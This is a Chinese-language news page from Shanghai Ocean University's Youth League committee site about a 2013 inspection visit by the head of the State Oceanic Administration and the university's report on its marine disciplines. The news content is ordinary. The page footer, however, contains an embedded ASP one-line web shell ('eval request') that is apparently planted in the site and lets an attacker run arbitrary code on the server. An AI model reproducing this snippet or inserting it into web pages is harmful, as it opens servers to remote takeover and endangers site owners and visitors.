当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 要闻速递 >> 正文  
站内信息搜索:
国家海洋局党组书记、局长刘赐贵一行视察我校
[2013年10月16日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    10月15日上午,国家海洋局党组书记、局长刘赐贵一行来我校视察。国家海洋局副局长、党组成员陈连增、国家海洋局办公室主任、财务司司长石青峰、国家海洋局东海分局局长刘刻福、国家海洋局极地办主任曲探宙、 中国极地研究中心主任杨惠根、农业部东海区渔政局局长李富荣、浦东新区副区长、南汇新城镇党委书记朱家骏、南汇新城镇党委副书记、镇长袁胜明等领导陪同视察。

刘赐贵局长参观海洋遥感实验室

刘赐贵局长在图文信息中心鸟瞰校园

     校党委书记吴嘉敏、校长潘迎捷陪同刘赐贵局长一行视察了我校图文信息中心和海洋遥感实验室,向各位领导介绍了我校校园布局规划和发展情况。随后,潘迎捷校长代表学校做了我校海洋学科建设与人才培养的专题汇报,潘校长在汇报中指出,我校由传统的水产大学向新型的海洋大学转变中,海洋学科建设是我们重中之重的主要任务。学校将抓住国家海洋局与上海市人民政府共建的机遇,打造“海洋学科特区”,推进内涵建设,坚持“聚焦、错位、合作”原则,全面加强海洋学科建设和人才培养工作。

刘赐贵局长一行听取我校学科发展汇报

刘赐贵局长勉励学校为国家海洋事业做出更大贡献

    国家海洋局党组书记、局长刘赐贵感谢上海市委、市政府对国家海洋事业的重视与支持,充分肯定了我校在发展中取得的一系列成就。他指出,近年来,上海海洋大学特别注重教学与科研紧密结合,教学与实际应用紧密结合,能够放眼全球,立足国家海洋事业的发展培养人才,把论文写在大洋上,取得了全方位的发展,学校正处于良好的发展态势之中。在实际应用方面,上海海洋大学一直具有优良的传统,当前学校既发挥了传统学科的优势,同时又有很大的创新和拓展,特别聚焦国家关注的海洋领域。刘局长希望学校继续发挥特色、优势,通过实实在在的努力,在某些领域能够达到世界领先水平,为国家海洋经济发展和海洋技术创新做出更大贡献。

 

关闭窗口

上一篇:我校召开节约型校园节能监管平台专家咨询(初验收)会

下一篇:2011远洋渔业协同创新中心重大任务凝练专家咨询会召开
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>